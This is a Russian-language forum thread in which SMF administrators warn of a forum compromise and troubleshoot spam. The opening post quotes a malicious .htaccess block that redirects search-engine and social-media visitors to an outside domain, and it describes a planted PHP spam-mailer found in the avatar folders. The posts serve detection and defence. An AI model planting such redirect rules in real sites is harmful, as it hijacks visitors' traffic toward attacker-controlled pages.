Взлом форума и рассылка спама + слив мобильного трафика

[Макар]

Внимание! Просьба проверить свои форумы на наличие посторонних файлов в корне расположения форума, в папке атачментов, аватаров (если настроена отдельная папка для аватаров) ........ да и в других папках. Проверить файл .htaccess на наличие постороннего кода

Код Выделить Развернуть

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://headergradient.ru/gamma/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://headergradient.ru/gamma/index.php [R=301,L]
</IfModule>

теперь конкретнее

приведенный выше код "сливает" ваш мобильный трафик (5-10% от всех посетителей) на указанный в редиректе сайт, откуда потом .................... х.з. что делается (пока не копал)

Файл в папках аватар, атачей php скрипт для рассылки спама. Письма рассылаются от юзер[at]ваш_домен , юзеры от чего имени идет рассылка ессно в базе форума не зарегистрированы.

Так же в корне форума может лежать php файл с вирусами. Что за вирусы внутри пока не разбирался.

Пострадавший: форум смф последовательно обновлявшийся с рс2 до 2.0.2 с 40ка установленными модами.

Как было замечено заражение - на почту начали приходить Mail delivery failed: returning message to sender
в теле которых значилась такая запись

------ This is a copy of the message, including all the headers. ------

Return-path: <meredith_baker[at]ваш-домен>
Received: from cfqn by xm24.почтовый сервер with local (Exim 4.69)
(envelope-from <meredith_baker[at]ваш-домен>)
id 1RmSBX-0000Af-4J
for morten_dalby[at]hotmeil.com; Sun, 15 Jan 2012 17:39:55 +0200
To: morten_dalby[at]hotmeil.com
Subject: Meredith Baker wants to add you as a contact
X-PHP-Script: ваш-домен/avatar/sm5ko6.php for 188.84.6.6, 188.84.6.6
From: "Meredith Baker" <meredith_baker[at]ваш-домен>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="==136d19c1e092a6bc79f39242=="
Message-Id: <E1RmSBX-0000Af-4J[at]tyretya.net>
Sender: <ваш-аккаунт[at]почтовый сервер>
Date: Sun, 15 Jan 2012 17:39:55 +0200

основная строка на которую стоит обратить внимание, это запись о том что за скрипт вызвал письмо X-PHP-Script: ваш-домен/avatar/sm5ko6.php for 188.84.6.6, 188.84.6.6 ------ ip это будет ip сервера на котором расположен ваш форум.

На данный момент идет выявление пути заражения и масштабов. Как отдельно взятого форума, и сервера на котором  он расположен, так и непосредственно файлов самого скрипта смф (с смф труднее, так как модов дюже много)

[karavan]

чисто.

[fatal1ty]

Пусто.

[Mavn]

Могу помочь с ковырянием логов

[Макар]

Mavn, спасибо, логи пока ковыряет хостер

[Noo]

Не знаю взлом или нет, но спам идет странно. Стоит SMF 2.0.4
Письмо от меня (админа) и там же в адресе от кого, еще один ящик просто набор букв к примеру "oliusq@aefxqv.com <acer5820@gmail.com>"
При этом текст сообщения с четырьмя неверными ссылками, тоже просто никчемный набор букв.
Менял в настройках E-mail веб-мастера, так же периодически примерно раз в 1-2 недели такие письма приходят и мне и пользователям. Вроде безобидные письма но поднадоедает.
Раньше такого не было, новых пользователей пускаю вручную и практически всех знаю. Где копать и что посмотреть или проверить и как?
Скрин письма приложил

[GeorG]

еще один ящик просто набор букв к примеру "oliusq[at]aefxqv.com <acer5820[at]gmail.com>"

http://yandex.ru/yandsearch?text=acer5820%40gmail.com&clid=48648&lr=47

[Noo]

Ну да, писал я в своем сообщении мыло. Сейчас удалил в посте, и что из-за этого такая фигня прет?

[GeorG]

Не, я просто подумал, это не ваш ящик, исходя из:

и там же в адресе от кого, еще один ящик просто набор букв к примеру

[Noo]

Ящик мой в моем посте на форуме, acer5820gmail.com который, так что делать то? У кого-нибудь подобное было?

[Mavn]

а опция поделится темой включена?
попробуйте отключить если да

[Noo]

Кнопка есть "Поделиться темой", а как отключить? Всю админку пересмотрел и не нашел где это делается.

[Mavn]

в правах доступа включение отключение по группам
но если смотрите под админом у вас то она всегда будет отображаться

[Slavegirl]

Обратила внимание, что форма отправки "Поделиться темой" не защищается капчей. А до этого я ее включала для гостей (по умолчанию была отключена). Теперь отключила обратно. Спасибо, Mavn!

[Noo]

В доступах убрал галочки "Отправка ссылок на темы друзьям и знакомым", посмотрим что будет